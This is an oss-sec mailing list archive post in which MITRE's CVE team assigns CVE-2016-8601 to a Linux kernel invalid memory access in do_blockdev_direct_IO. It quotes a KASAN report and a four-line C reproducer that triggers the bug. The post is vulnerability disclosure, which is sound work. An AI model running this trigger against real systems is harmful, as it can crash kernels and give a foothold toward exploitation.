oss-sec mailing list archives

Re: linux kernel do_blockdev_direct_IO invalid memory access

From: cve-assign () mitre org
Date: Tue, 11 Oct 2016 12:27:08 -0400 (EDT)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

BUG: KASAN: wild-memory-access on address 0005080000000000
https://gist.github.com/marcograss/40850adb3c599ac38e0beac31617d56b

  int fd = open("./hurrdurr", O_APPEND|O_RDWR|0x40);
  fcntl(fd, 4, 0x44000, 0, 0, 0);
  fallocate(fd, 0, 0x21, 0xafa6);
  sendfile(fd, fd, &offset, 0x800);


Use CVE-2016-8601.

- -- 
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJX/RJEAAoJEHb/MwWLVhi2yj0P/2qJJyACywfMz3qISvkHem8T
8vS2DrjBIC2LWMFAJZUuoI0qoA4sZ5B6MQKPEEbDE9F0GSwRWXMeddl1xjpEyhh1
BwVYgfRfjYZIdgo6HQnlP4BiFlArELn6PZqLxbP0JqvOVrdWKrI0Snw8oyV5KoO1
+oSbgpTiYIVsxfolgbk/LSSEuv7w+1KZMQGVmEpUt5aerASDbFlOYLRnXbgThaM9
BYjjpfYGJ7iC4F+MUwCOLH8BUw0QMQsUJ33AgjVvpCa9d/XajJN44ToBYfNghOYq
cGKUOtB7P6abUxVYPJWFWT7Hyn3d/OBsY4tE5Rx6yTfNg7z6MFjhdzhy92QclbqA
jJnKGvNSjUXoiBKh3SqZ/bL8pLlzVvXxkW8sjLlfIcKP8VicGRQtV7gphQnb6MXK
2rEp1qlTbNmyvnJ6HCLa83XjuYs81ngOzU3vXJ7BDhh0V5vLvyN1hwg9b+V4kL3A
6yrACwIWOwxyAvUaXLUn+jAO1LWIKmWYOf7ok1xbSNhRlD/x2/RON+CR05S7jEX9
QXTibJFWYNbslLPSYhgDSR7j8lLgbRmlppl/SFP5TBDeYB+FyvtnHCdRen/XCvZQ
mEN+1cBwmQ48w2X/gE8ZI957LCnWzJsbwFdrj9ECueVgf/P0vfE/4isxVsgbnOPe
ALHNeskNgkbeDnKt5ymx
=wgdQ
-----END PGP SIGNATURE-----

Current thread:

linux kernel do_blockdev_direct_IO invalid memory access Marco Grassi (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
  - Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)
- Re: linux kernel do_blockdev_direct_IO invalid memory access cve-assign (Oct 11)
  - Re: Re: linux kernel do_blockdev_direct_IO invalid memory access Greg KH (Oct 11)